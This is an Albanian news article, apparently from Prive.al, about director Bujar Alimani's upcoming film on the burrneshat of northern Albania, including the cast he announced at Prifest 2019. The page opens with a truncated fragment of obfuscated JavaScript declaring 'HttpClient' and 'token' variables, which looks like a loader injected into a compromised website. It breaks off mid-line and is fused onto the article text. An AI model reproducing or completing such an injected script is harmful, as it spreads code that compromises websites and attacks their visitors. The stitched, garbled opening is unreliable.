;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Filmi për burrneshat shqiptare mbledh ajkën e aktorëve në një kastë

By

Bujar Alimani është një nga shkrimtarët më të rëndësishëm  të Kinemasë së Re Shqiptare.

Filmi Delegacioni ku storia vendoset në Shqipërinë e vitit 1990, një delegacion evropian vjen në Tiranë për të monitoruar reformat e regjimit komunist. Një zyrtar qeveritar dërgohet në një mision në një burg të largët për të sjellë një disident të rëndësishëm në kryeqytet. Ky film u shfaq edhe në Prifest 2019, ku Bujari po ashtu foli edhe për filmin e radhës në të cilin po punon.

Ai po punon në një film, rreth një fenomeni autentik shqiptar dhe shumë origjinal – fenomeni i burrneshave shqiptare.

Meqenëse ky lloj fenomeni ndodh thekshëm në Shqipërinë e Veriut, në Prifest Alimani tha se kjo është arsyeja pse kasta e aktorëve do jenë folës të dialektit gegë dhe se kjo do i jepte origjinalitet filmit dhe do përcillte kulturën e këtij regjioni tek shikuesi.

Audicioni për këtë film ishte i hapur si në Kosovë ashtu edhe në Shqipëri. Pas një përzgjedhje shumë të kujdesshme në përputhje më kualitetet që Alimani kërkonte tek aktorët për këtë film, kasti është filtruar duke u përzgjedhur ajka e aktorëve shqiptar nga Shqipëria dhe nga Kosova.

Gjatë intervistës në Prifest, Alimani i zbuloi të gjithë emrat e aktorëve e që ishin: Çun Lajqi, Astrit Kabashi, Aurita Agushi, Gresa Pallaska, Fatlume Bunjaku, Andi Bajgora, Lum Veseli, Blerta Surroi dhe Alban Ukaj.

“Duke u miksuar këta me Viktor Zhustin, Lulzim Zeqën nga Shqipëria, Gëzim Rudin, Nik Xhelilajn i cili ka një nga rolet kryesore, mendojmë që do të bëjmë një kast shumë të mirë aktorësh që do ta bëjnë shumë të fortë filmin dhe ky film do të shkojë shumë mirë.” tha ai në intervistë në Prifest, sa i përket kastës së aktorëve.

Intervistën e tij të plotë si dhe natën e dytë të Prifest mund ta ndiqni më poshtë. /Prive.al

 

 

Artikuj të ngjashëm